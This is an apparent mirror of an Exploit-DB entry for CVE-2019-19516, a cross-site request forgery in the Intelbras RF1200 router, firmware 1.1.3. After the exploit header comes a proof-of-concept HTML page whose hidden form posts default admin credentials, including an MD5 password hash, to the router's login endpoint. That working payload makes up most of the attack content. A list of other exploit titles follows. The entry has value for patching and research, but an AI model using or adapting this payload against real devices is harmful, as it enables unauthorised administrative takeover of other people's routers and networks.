Intelbras Router RF1200 1.1.3 – Cross-Site Request Forgery

Exploit Database
13 阅读

作者： Prof. Joas Antonio

日期： 2019-12-03
类别：
- webapps
平台：
- hardware
来源：https://www.exploit-db.com/exploits/47738/

# Exploit Title: Intelbras Router RF1200 1.1.3 - Cross-Site Request Forgery 
# Date: 2019-11-06
# Exploit Author: Joas Antonio
# Vendor Homepage: intelbras.com.br
# Software Link: https://www.intelbras.com/pt-br/roteador-wireless-smart-dual-band-action-rf-1200
# Version: 1.1.3 (REQUIRED)
# Tested on: Windows
# CVE : CVE-2019-19516

#POC1: 
<html>
	<body>
		<form method="POST" action="http://IPROUTERRF1200/login/Auth">
			<input type="hidden" name="username" value="admin"/>
			<input type="hidden" name="password" value="21232f297a57a5a743894a0e4a801fc3"/> <!-- password admin -->
			<input type="submit" value="Submit">
		</form>
	</body>
<html>

last Exploits
Intelbras Router RF1200 1.1.3 – Cross-Site Request Forgery的更多信息

WordPress Plugin spider Calendar – Multiple Vulnerabilities：
ECOA Building Automation System – Weak Default Credentials：
FatPipe Networks WARP 10.2.2 – Authorization Bypass：
DomainSale PHP Script 1.0 – ‘id’ SQL Injection：
SWFupload 2.5.0 Beta 3 – Arbitrary File Upload：
Oracle Secure Backup – Authentication Bypass/Command Injection (Metasploit)：
TestLink 1.9.11 – Multiple SQL Injections：
Concrete5 CMS FlashUploader – Arbitrary ‘.SWF’ File Upload：